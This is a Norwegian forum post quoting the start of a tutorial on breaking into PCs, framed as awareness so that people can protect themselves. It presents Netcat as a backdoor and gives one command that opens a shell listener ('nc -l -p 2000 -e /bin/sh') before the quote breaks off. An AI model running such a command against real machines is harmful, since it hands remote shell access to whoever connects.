Søk | Statistikk | Bruker Liste Forum | Kalendere | Album | Tips
© Navigate3D Forum
© Navigate3D Forum ->  GPS-relatert, tur beskrivelser, foto, film, PC -> PC administrasjon, optimalisering og bruk -> Vis Tråd

Du er pålogget som en gjest. ( logg inn | registrer )
Poster siste Døgn
Uke Måned

Tips: "The New Age? It's just the old age stuck in a microwave oven for fifteen seconds." - James Randi

Hvordan bryte seg inn i en PC
Hopp til side : 1
Viser side 1 [25 meldinger per side]
Vis forrige tråd :: Vis neste tråd
   GPS-relatert, tur beskrivelser, foto, film, PC -> PC administrasjon, optimalisering og brukMelding format

Otto
Posta 20/4/2010 23:40 (#6096)
Emne: Hvordan bryte seg inn i en PC

Top Team

Poster: 6958
500010005001001001001002525
Lokasjon: © Navigate3D.no

Hvordan bryte seg inn i en PC

Sitat:

+{

Her er en oppskift på hvordan man kan gjøre innbrudd i andre datamaskiner på nett. Siden jeg vil holde meg innenfor lovens rammer vil jeg bryte meg inn hos meg selv. Denne teksten publiseres for å vise hvor enkelt det er, og for å opplyse om metoder som brukes -så man kan beskytte seg. Det tas ingen ansvar for feil og ulovlig bruk av informasjon i dette innlegget.

En bakdør

I dette første og enkle eksempelet vil jeg bruke Netcat som bakdør. Den er fleksibel og kan gjøre det meste. Netcat er et lite kommandolinjeprogram som ofte kalles bare nc. For å illustrere hva den er god for er den første setningen i manualsiden beskrivende: nc – TCP/IP swiss army knife.

Litt hypotetisk: Tenk om to PC’er er på ett nett. Den ene har IP adresse 192.168.0.2 og heter abc og den andre heter xyz. På PC abc kjører vi denne kommandoen:

user@abc~:$ nc -l -p 2000 -e /bin/sh

..

}+

neppe .no

(NeppeNo.gif)

Vedlegg
----------------
Vedlegg NeppeNo.gif (57KB - 340 nedlastinger)
Toppen av siden Bunnen av siden
Hopp til side : 1
Viser side 1 [25 meldinger per side]
Hopp til forum :
Søk i dette forumet
Printer vennlig versjon
E-mail en lenke til denne tråden

Share/BookmarkShare/Bookmark
Navigate3D coffee house

(Slett alle cookies satt av dette nettstedet)
Running MegaBBS ASP Forum Software
© 2002-2018 PD9 Software